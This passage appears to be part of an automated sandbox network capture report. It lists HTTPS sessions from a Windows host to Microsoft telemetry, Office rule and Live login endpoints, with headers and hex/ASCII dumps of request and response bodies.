                                                                                                                                                                                                                                                                                                                    P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                                    Set-Cookie: MC1=GUID=4a306d7bcd794d31b0f50ba0dc655f80&HASH=4a30&LV=202411&V=4&LU=1732694815866; Domain=.microsoft.com; Expires=Thu, 27 Nov 2025 08:06:55 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                    Set-Cookie: MS0=1d355ec3fccc43d3a3950d3875304318; Domain=.microsoft.com; Expires=Wed, 27 Nov 2024 08:36:55 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                    time-delta-millis: -6157757
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:55 GMT
                                                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    126192.168.2.74990913.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:55 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:56 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:56 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 1952
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: fdde7aaa-d01e-0028-2a8c-3f7896000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080656Z-174f78459685726chC1EWRsnbg0000000wmg00000000bmm4
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:56 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    127192.168.2.74991120.42.73.304438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:56 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732700974592&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    Content-Length: 5249
                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                    Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                    Cookie: USRLOC=; MUID=39EBC277A9596CA639AAD733A8706D90; _EDGE_S=F=1&SID=35E38335F0836A5611389671F1A26B28; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:56 UTC5249OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 32 37 54 30 39 3a 34 39 3a 33 34 2e 35 39 31 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 34 35 65 65 61 32 35 37 2d 63 34 35 66 2d 34 35 62 38 2d 39 37 62 62 2d 64 33 32 36 64 36 39 39 39 37 37 32 22 2c 22 65 70 6f 63 68 22 3a 22 31 34 31 32 31 38 31 38 37 33 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                                                    Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-11-27T09:49:34.591Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"45eea257-c45f-45b8-97bb-d326d6999772","epoch":"1412181873"},"app":{"locale
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:57 UTC894INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                    P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                                    Set-Cookie: MC1=GUID=6c22c746c4664e4db12adf9566082d79&HASH=6c22&LV=202411&V=4&LU=1732694817341; Domain=.microsoft.com; Expires=Thu, 27 Nov 2025 08:06:57 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                    Set-Cookie: MS0=c90e5232879d4551bf27c6d15e2c79dc; Domain=.microsoft.com; Expires=Wed, 27 Nov 2024 08:36:57 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                    time-delta-millis: -6157251
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:57 GMT
                                                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    128192.168.2.74991020.231.128.67443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:56 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                                                                    Content-Length: 3592
                                                                                                                                                                                                                                                                                                                    Host: login.live.com
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:56 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:57 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                    Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                                                                    Expires: Wed, 27 Nov 2024 08:05:56 GMT
                                                                                                                                                                                                                                                                                                                    P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                    x-ms-route-info: C525_BL2
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 10db484c-bb57-48f9-a78e-90270b842263
                                                                                                                                                                                                                                                                                                                    PPServer: PPV: 30 H: BL02EPF0001D84D V: 0
                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:56 GMT
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Content-Length: 11389
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:57 UTC11389INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    129192.168.2.74991420.42.73.304438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:56 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732700974626&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    Content-Length: 9358
                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                    Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                    Cookie: USRLOC=; MUID=39EBC277A9596CA639AAD733A8706D90; _EDGE_S=F=1&SID=35E38335F0836A5611389671F1A26B28; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:56 UTC9358OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 32 37 54 30 39 3a 34 39 3a 33 34 2e 36 32 35 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 34 35 65 65 61 32 35 37 2d 63 34 35 66 2d 34 35 62 38 2d 39 37 62 62 2d 64 33 32 36 64 36 39 39 39 37 37 32 22 2c 22 65 70 6f 63 68 22 3a 22 31 34 31 32 31 38 31 38 37 33 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63
                                                                                                                                                                                                                                                                                                                    Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-11-27T09:49:34.625Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"45eea257-c45f-45b8-97bb-d326d6999772","epoch":"1412181873"},"app":{"loc
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:57 UTC894INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                    P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                                    Set-Cookie: MC1=GUID=290af02a90924c01a161925a61d2de50&HASH=290a&LV=202411&V=4&LU=1732694816752; Domain=.microsoft.com; Expires=Thu, 27 Nov 2025 08:06:56 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                    Set-Cookie: MS0=3bdffe775e1b4523ab4e2c161f4e110c; Domain=.microsoft.com; Expires=Wed, 27 Nov 2024 08:36:56 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                    time-delta-millis: -6157874
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:56 GMT
                                                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    130192.168.2.74991313.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:56 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:57 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:56 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 958
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: c668448b-101e-007a-2d91-3f047e000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080656Z-174f7845968kdththC1EWRzvxn00000009100000000047b0
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:57 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    131192.168.2.74991520.42.73.304438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:56 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732700975139&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    Content-Length: 5525
                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                    Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                    Cookie: USRLOC=; MUID=39EBC277A9596CA639AAD733A8706D90; _EDGE_S=F=1&SID=35E38335F0836A5611389671F1A26B28; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:56 UTC5525OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 32 37 54 30 39 3a 34 39 3a 33 35 2e 31 33 38 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 36 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 34 35 65 65 61 32 35 37 2d 63 34 35 66 2d 34 35 62 38 2d 39 37 62 62 2d 64 33 32 36 64 36 39 39 39 37 37 32 22 2c 22 65 70 6f 63 68 22 3a 22 31 34 31 32 31 38 31 38 37 33 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63
                                                                                                                                                                                                                                                                                                                    Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-11-27T09:49:35.138Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":6,"installId":"45eea257-c45f-45b8-97bb-d326d6999772","epoch":"1412181873"},"app":{"loc
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:57 UTC894INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                    P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                                    Set-Cookie: MC1=GUID=0df9409a7fd94ec0b3cfcce4f5030a5a&HASH=0df9&LV=202411&V=4&LU=1732694816877; Domain=.microsoft.com; Expires=Thu, 27 Nov 2025 08:06:56 GMT; Path=/;Secure; SameSite=None
